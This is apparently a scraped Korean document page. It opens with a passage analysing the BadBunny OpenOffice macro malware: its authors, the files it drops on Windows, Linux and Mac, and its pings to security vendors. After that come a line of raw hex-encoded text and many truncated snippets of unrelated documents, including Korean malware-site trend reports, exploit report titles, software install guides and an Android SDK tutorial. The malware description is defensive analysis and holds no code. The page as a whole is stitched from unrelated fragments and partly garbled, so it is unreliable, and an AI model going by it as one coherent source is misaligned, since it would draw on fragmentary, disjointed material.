56 [ 그림 3-7] 배드버니에감염된문서 소스코드를보면이악성코드는자신을 Necronomikon 과 Wargame 으로부르는사람들이 제작했음을알수있다. 이들은 DoomRiderz 라는독일의바이러스제작그룹멤버였으며 2007 년 12 월 28 일그룹을떠난것으로알려졌다. 오픈오피스는윈도우, 매킨토시, 리눅스등멀티플랫폼에서실행되므로현재실행되는환경 을알수있다. 악성매크로가실행되면초기화를하고 Startgame 을호출한다. Startgame 에서현재시스템의버전을얻어낸다. 1 번이 Windows, 3 번매킨토시, 4 번리눅스이다. - 윈도우에서는 mirc가설치되어있을경우 mirc 스크립트를생성하고 c:\badbunny.js 파일을생성하고실행한다. - 리눅스에서는 badbunny.py라는파이썬 (Python) 스크립트를생성하고펄스크립트파일인 BadBunny.pl 파일을생성한다. - 매킨토시에서는난수를발생해발생하는수에따라다른파일을생성한다. 제작자는특정한문자열과그림을문서에추가하려했지만한글버전 2.2 에서는오류가발 생한다. 또윈도우버전의경우 [ 그림 3-8] 과같이 c:\badbunny.js 를실행할때오류가발 생했다. 56
57 [ 그림 3-8] 배드버니실행시발생하는오류 원래삽입하려는이미지는버니복장의남자와여성의포르노사진이었다. 이후메시지창으 로사용자에게메시지를출력한다. [ 그림 3-9] 사용자에게보내는메시지 그리고, 다음보안업체에 PING 명령을보낸다
58 (comm은오타로보임 ) 하지만, 테스트에사용된한글오픈오피스에서는종종오류가발생해제대로악성코드가실 행되지않았다. 향후오픈오피스악성코드전망 오픈오피스가악성코드제작자의다음목표가될거라는전망은예전부터있었다. 하지만, 오픈오피스사용자가아직다른오피스에비해적고악성코드제작자들은재미나명성보다는돈을쫓는경향이강하기때문에오픈오피스에관심을가지는악성코드제작자는명성을쫓는전통적인바이러스제작자나제작그룹에한정될것으로보인다. 다행히오픈오피스는과거수많은매크로바이러스를양산한 MS 오피스의교훈을거울삼아매크로기능을기본적으로사용할수없게하고사용자가선택해야실행할수있는형태로제작되어악성코드에감염될가능성을낮췄다. 또한현재까지제작된악성코드역시개념증명수준의문제를가지고있다. 하지만, 멀티플랫폼으로제작된오피스제품의특성상하나의악성코드로다양한환경에서활동할수있는악성코드제작은늘가능하다. 오픈오피스명성이높아가고사용자가늘어날수록악성코드의검은그림자도따라갈수있다. 참고자료 [1] 오픈오피스 ( [2] 오픈오피스한국어버전 ( [3] 김정규, 오픈오피스와오픈도큐먼트 [4] Gooo ( 58
< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationSystem Recovery 사용자 매뉴얼
Samsung OS Recovery Solution 을이용하여간편하게 MagicInfo 의네트워크를설정하고시스템을백업및복원할수있습니다. 시스템시작시리모컨의 - 버튼이나키보드의 F3 키를연속해서누르면복구모드로진입한후 Samsung OS Recovery Solution 이실행됩니다. Samsung OS Recovery Solution 은키보드와리모컨을사용하여조작할수있습니다.
More information` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10
월간악성코드은닉사이트탐지 동향보고서 5 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환
취약점분석보고서 [Photodex ProShow Producer v5.0.3256] 2012-07-24 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Photodex ProShow Producer Buffer Overflow 취약점분석... 2 2.1. Photodex ProShow Producer Buffer
More information월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부
월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More informationMicrosoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More information월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부
월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부 ` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 6 2.1 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP10 7 - 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10 2.2 악성코드경유지현황
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More informationStuduino소프트웨어 설치
Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...
More information08_spam.hwp
1. 개요 최근국내외에서 E-card 발송을가장한스팸메일로인하여악성코드에감염되는피해가다수보고되었다. 악성코드는메일본문에악의적인 URL을삽입및클릭을유도하는방식으로스팸메일을발송한다. 사용자가스팸메일에포함되어있는악성URL을클릭할경우감염될수있으며, 감염후에는악성코드가감염PC내에저장되어있는메일주소들을추출하여해당주소로동일유형의스팸메일을발송하게된다. 또한, P2P를통한명령전달및추가악성코드다운로드등의악성행위가예상되므로사용자는
More information354-437-4..
357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%
More informationA SQL Server 2012 설치 A.1 소개 Relational DataBase Management System SQL Server 2012는마이크로소프트사에서제공하는 RDBMS 다. 마이크로소프트사는스탠다드 standard 버전이상의상업용에디션과익스프레스 exp
A SQL Server 0 설치 A. 소개 Relational DataBase Management System SQL Server 0는마이크로소프트사에서제공하는 RDBMS 다. 마이크로소프트사는스탠다드 standard 버전이상의상업용에디션과익스프레스 express 버전 의무료에디션을제공하는데, 이책에서는실습을위해 SQL Server 0 익스프레스에디 션 SP
More informationASEC Report
ASEC Report 10 월 ASEC Report 2008. 11. I. ASEC Monthly Trend & Issue... 2 (1) 악성코드 MS08-067 윈도우보안취약점을악용하는악성코드... 2 (2) 스파이웨어 스팸메일러피해증가... 5 (3) 시큐리티 원격공격이가능한 MS08-067... 9 (4) 네트워크모니터링현황 TCP 445 포트공격시도...
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information(Microsoft Word - ASEC Report 2008\263\3428\277\371\310\243.doc)
ASEC Report 8월 ASEC Report 2008. 9. I. ASEC 월간통계 2 (1) 8월악성코드통계 2 (2) 8월스파이웨어통계 11 (3) 8월시큐리티통계 13 II. ASEC Monthly Trend & Issue 15 (1) 악성코드 허위안티바이러스설치를위장한사기성스팸메일기승 15 (2) 스파이웨어 악성허위안티 - 스파이웨어 AntiVirusXP2008
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상
Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More information유포지탐지동향
월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2
월간악성코드은닉사이트탐지 동향보고서 (1 월 ) 2015. 02. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 3 2.1 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP10 4 - 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황
More information메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for
메일서버등록제(SPF) 인증기능적용안내서 (Exchange 2003 - Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for Exchange 2016 년 6 월 - 1 - 목 차 I. 개요 1 1. SPF( 메일서버등록제)
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More information< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉
월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2014. 03. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 15 3. 악성코드은닉사례분석
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More informationDDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS
DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE-2013-3897) 을통해유포되는악성코드가 DDoS, 원격제어, 게임계정유출기능을하고국내감염 PC 가 2만 8천여대에이르러 KISA 는신속대응한바있다.
More informationSecurity Trend ASEC Report VOL.56 August, 2014
Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,
More informationInstall stm32cubemx and st-link utility
STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationCODESYS 런타임 설치과정
CODESYS 런타임설치과정 CODESYS Control RTE / SoftMotion RTE Setup Web: www.altsoft.kr E-mail: altsoft@altsoft.kr Tel: 02-547-2344 목 차 CODESYS 런타임 - Control RTE, SoftMotion RTE... 2 다운로드및설치과정... 2 CODESYS EtherCAT
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More information5th-KOR-SANGFOR NGAF(CC)
NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는
More informationMicrosoft Word - windows server 2003 수동설치_non pro support_.doc
Windows Server 2003 수동 설치 가이드 INDEX 운영체제 설치 준비과정 1 드라이버를 위한 플로피 디스크 작성 2 드라이버를 위한 USB 메모리 작성 7 운영체제 설치 과정 14 Boot Sequence 변경 14 컨트롤러 드라이버 수동 설치 15 운영체제 설치 17 운영체제 설치 준비 과정 Windows Server 2003 에는 기본적으로
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More information개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-
개인정보보호의 이해와 안전한 관리 - 안전한 개인정보 관리- 2013. 6. 26 최 윤 형 (한국정보화진흥원) 1 안전한 개인PC 관리방법 목 차 2 안전한 스마트폰 관리방법 1. 안전한 개인PC 관리방법 정보통신 기기의 보안 위협요인 위협요소 웜, 바이러스, 악성코드, DDos공격침입, 네트워크 공격 휴대성, 이동성 오픈 플랫폼 3G, WiFi, Wibro
More information한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 -
한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 - [1 단계 ] 운영체제별시스템설정방법 Windows XP 시스템설정방법 : XP 운영체제는설정할사항이없음 Windows 7 시스템설정방법 1) [ 시작 ]-[ 제어판 ]-[ 관리센터 ] 를클릭한다. - 2 - 2) 사용자계정컨트롤설정변경 을클릭한다. 3) 알리지않음 ( 사용자계정컨트롤끄기
More information<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >
6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012
More information<C0CCC8ADC1F82E687770>
분석보고서 09. 11. 06. 작성 악성봇분석과예방 (Analysis Malicious Bot & Protection) 작성자 : 영남대학교 @Xpert 이화진 ghkwls0308@ynu.ac.kr - 1 - - 목차 - 1. About 봇... 3 1) 봇의정의 2) 봇의특징 3) 봇의동작원리 2. 악성 IRC봇... 4 1) 정의 2) 동작원리 3) 증상
More information목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.
소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423
More informationSIGIL 완벽입문
누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS
More informationASEC Report
ASEC Report 12 월 ASEC Report 2009. 1. I. 이달의보안이슈... 2 (1) 악성코드 IE 제로데이취약점과쿠폰을가장한악성코드... 2 (2) 스파이웨어 애드웨어의새로운시도... 5 (3) 시큐리티 MS08-078 IE XML 제로데이취약점... 9 (4) 네트워크모니터링현황 MS08-067 취약점공격트래픽... 12 (5) 중국보안이슈
More information07_alman.hwp
1. 개요 Alman 바이러스는국내에서감염피해가다수보고되었다. 여기서는 Alman 바이러스변종 에감염될경우의악성기능에대하여살펴보았다. Alman은감염된시스템내의실행파일들을추가로감염시킨다. 타시스템사용자가감염된실행파일들을감염여부를확인하지않고복사하여사용할경우감염되게된다. 또한, 네트워크공유폴더와이동디스크를통하여전파되므로, 윈도우암호와공유폴더암호를추측하기어렵게설정하고주기적으로이동저장매체에대한백신점검을실시하는것이필요하다.
More informationTGDPX white paper
White Paper DDoS 공격 대응의 새로운 패러다임 AhnLab TrusGuard DPX Revision Version: AhnLab TrusGuard DPX White Paper ver. 1.0 Release Date: April, 2010 AhnLab, Inc. 6th Fl., CCMM Bldg. 12 Yeouido-dong, Yeongdeungpo-gu,
More information제20회_해킹방지워크샵_(이재석)
IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!
More information리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.
3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More information제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호
제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법
